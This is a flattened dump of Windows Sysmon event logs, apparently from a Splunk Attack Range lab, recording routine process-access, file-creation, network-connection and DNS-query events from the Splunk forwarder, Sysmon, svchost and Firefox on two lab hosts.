21:46:08.447{39BD8DE3-0F64-60CA-0C00-00000000D101}7201900C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151371Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:08.447{39BD8DE3-0F64-60CA-0C00-00000000D101}7201900C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151370Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:08.447{39BD8DE3-0F63-60CA-0500-00000000D101}408424C:\Windows\system32\csrss.exe{39BD8DE3-7120-60CA-1F0D-00000000D101}7080C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000151369Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:08.447{39BD8DE3-0F64-60CA-0C00-00000000D101}7201900C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151368Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:08.447{39BD8DE3-0F64-60CA-0C00-00000000D101}7201900C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151367Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:08.447{39BD8DE3-480D-60CA-F607-00000000D101}51125172C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{39BD8DE3-7120-60CA-1F0D-00000000D101}7080C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000151366Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:08.449{39BD8DE3-7120-60CA-1F0D-00000000D101}7080C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{39BD8DE3-0F64-60CA-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{39BD8DE3-480D-60CA-F607-00000000D101}5112C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000151365Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:08.231{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2C83DE3713C7889B132A96530E585988,SHA256=8F2B892BF2E50100EE14AA831A32F1B8130151FA5400ECBDA063C27AA021C66D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151364Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:08.216{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\permissions.sqlite-journalMD5=3AF88E54515EC4FC107F471C753D7B5F,SHA256=F2BF8D27FE9136589DFDFCC80769D6565C4CDC9BB1B7BCC91B478ADF1EA686D5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000151363Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:08.178{39BD8DE3-711F-60CA-1E0D-00000000D101}8324524C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{39BD8DE3-480D-60CA-F607-00000000D101}5112C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000104904Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:09.544{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0B7277C4AF20503284DA32199CD170AC,SHA256=C08AF6B0682D0067F185611E5AE6DF5AA7D2ACC74EBCA9FAD18F25A324AEA73F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000151424Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:08.665{39BD8DE3-131D-60CA-0B01-00000000D101}1192C:\Program Files\Mozilla Firefox\firefox.exeWIN-HOST-14\Administratortcptruefalse10.0.1.15win-host-14.attackrange.local58400-false34.107.221.8282.221.107.34.bc.googleusercontent.com80http 354300x8000000000000000151423Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:08.649{39BD8DE3-131D-60CA-0B01-00000000D101}1192C:\Program Files\Mozilla Firefox\firefox.exeWIN-HOST-14\Administratortcptruefalse10.0.1.15win-host-14.attackrange.local58399-false34.107.221.8282.221.107.34.bc.googleusercontent.com80http 22542200x8000000000000000151422Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:08.670{39BD8DE3-131D-60CA-0B01-00000000D101}1192youtube.googleapis.com.0172.217.14.234;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000151421Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:08.669{39BD8DE3-131D-60CA-0B01-00000000D101}1192google.com.0172.217.14.206;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000151420Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:08.669{39BD8DE3-131D-60CA-0B01-00000000D101}1192www.google.com.0142.250.69.196;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000151419Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:08.651{39BD8DE3-131D-60CA-0B01-00000000D101}1192detectportal.firefox.com0type: 5 detectportal.prod.mozaws.net;type: 5 prod.detectportal.prod.cloudops.mozgcp.net;34.107.221.82;C:\Program Files\Mozilla Firefox\firefox.exe 23542300x8000000000000000151418Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:09.750{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CB64F9A543EFE3A3180FB6E4EC518353,SHA256=D1639EB86FCC42D0CEE8B9E36CEB104931F08850783140CD1953254B3F6E8ABF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151417Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:09.750{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BC8DE3E2CE4EC31349FC2FAD1CA3F784,SHA256=B2F0C8DC1AF28FDE6B345304586AB1EBC1922776529A6817E30AC8215E1DB7CC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000151416Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:09.419{39BD8DE3-7121-60CA-200D-00000000D101}71523916C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{39BD8DE3-480D-60CA-F607-00000000D101}5112C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151415Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:09.419{39BD8DE3-131D-60CA-0B01-00000000D101}11926820C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+2cf80|C:\Program Files\Mozilla Firefox\firefox.exe+2cad3|C:\Program Files\Mozilla Firefox\firefox.exe+40de0|C:\Program Files\Mozilla Firefox\firefox.exe+40adc|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151414Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:09.419{39BD8DE3-131D-60CA-0B01-00000000D101}11926820C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+2cf80|C:\Program Files\Mozilla Firefox\firefox.exe+2cad3|C:\Program Files\Mozilla Firefox\firefox.exe+40de0|C:\Program Files\Mozilla Firefox\firefox.exe+40adc|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151413Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:09.419{39BD8DE3-131D-60CA-0B01-00000000D101}11926820C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+2cf80|C:\Program Files\Mozilla Firefox\firefox.exe+2cad3|C:\Program Files\Mozilla Firefox\firefox.exe+40de0|C:\Program Files\Mozilla Firefox\firefox.exe+40adc|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151412Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:09.419{39BD8DE3-131D-60CA-0B01-00000000D101}11926820C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+2cf80|C:\Program Files\Mozilla Firefox\firefox.exe+2cad3|C:\Program Files\Mozilla Firefox\firefox.exe+40de0|C:\Program Files\Mozilla Firefox\firefox.exe+40adc|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151411Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:09.419{39BD8DE3-131D-60CA-0B01-00000000D101}11926820C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+2cf80|C:\Program Files\Mozilla Firefox\firefox.exe+2cad3|C:\Program Files\Mozilla Firefox\firefox.exe+40de0|C:\Program Files\Mozilla Firefox\firefox.exe+40adc|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151410Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:09.403{39BD8DE3-131D-60CA-0B01-00000000D101}11926820C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+2cf80|C:\Program Files\Mozilla Firefox\firefox.exe+2cad3|C:\Program Files\Mozilla Firefox\firefox.exe+40de0|C:\Program Files\Mozilla Firefox\firefox.exe+40adc|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151409Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:09.403{39BD8DE3-131D-60CA-0B01-00000000D101}11926820C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+2cf80|C:\Program Files\Mozilla Firefox\firefox.exe+2cad3|C:\Program Files\Mozilla Firefox\firefox.exe+40de0|C:\Program Files\Mozilla Firefox\firefox.exe+40adc|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151408Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:09.403{39BD8DE3-131D-60CA-0B01-00000000D101}11926820C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+2cf80|C:\Program Files\Mozilla Firefox\firefox.exe+2cad3|C:\Program Files\Mozilla Firefox\firefox.exe+40de0|C:\Program Files\Mozilla Firefox\firefox.exe+40adc|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151407Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:09.403{39BD8DE3-131D-60CA-0B01-00000000D101}11926820C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+2cf80|C:\Program Files\Mozilla Firefox\firefox.exe+2cad3|C:\Program Files\Mozilla Firefox\firefox.exe+40de0|C:\Program Files\Mozilla Firefox\firefox.exe+40adc|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151406Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:09.387{39BD8DE3-131D-60CA-0B01-00000000D101}11926820C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+2cf80|C:\Program Files\Mozilla Firefox\firefox.exe+2cad3|C:\Program Files\Mozilla Firefox\firefox.exe+40de0|C:\Program Files\Mozilla Firefox\firefox.exe+40adc|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000151405Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:07.437{39BD8DE3-480D-60CA-F607-00000000D101}5112C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-14.attackrange.local58398-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8089- 10341000x8000000000000000151404Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:09.260{39BD8DE3-131D-60CA-0B01-00000000D101}11926820C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+2cf80|C:\Program Files\Mozilla Firefox\firefox.exe+2cad3|C:\Program Files\Mozilla Firefox\firefox.exe+40de0|C:\Program Files\Mozilla Firefox\firefox.exe+40adc|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151403Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:09.229{39BD8DE3-131D-60CA-0B01-00000000D101}11926820C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+2cf80|C:\Program Files\Mozilla Firefox\firefox.exe+2cad3|C:\Program Files\Mozilla Firefox\firefox.exe+40de0|C:\Program Files\Mozilla Firefox\firefox.exe+40adc|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151402Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:09.229{39BD8DE3-131D-60CA-0B01-00000000D101}11926820C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+2cf80|C:\Program Files\Mozilla Firefox\firefox.exe+2cad3|C:\Program Files\Mozilla Firefox\firefox.exe+40de0|C:\Program Files\Mozilla Firefox\firefox.exe+40adc|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151401Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:09.229{39BD8DE3-131D-60CA-0B01-00000000D101}11926820C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+2cf80|C:\Program Files\Mozilla Firefox\firefox.exe+2cad3|C:\Program Files\Mozilla Firefox\firefox.exe+40de0|C:\Program Files\Mozilla Firefox\firefox.exe+40adc|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151400Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:09.229{39BD8DE3-131D-60CA-0B01-00000000D101}11926820C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+2cf80|C:\Program Files\Mozilla Firefox\firefox.exe+2cad3|C:\Program Files\Mozilla Firefox\firefox.exe+40de0|C:\Program Files\Mozilla Firefox\firefox.exe+40adc|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151399Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:09.229{39BD8DE3-131D-60CA-0B01-00000000D101}11926820C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+2cf80|C:\Program Files\Mozilla Firefox\firefox.exe+2cad3|C:\Program Files\Mozilla Firefox\firefox.exe+40de0|C:\Program Files\Mozilla Firefox\firefox.exe+40adc|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 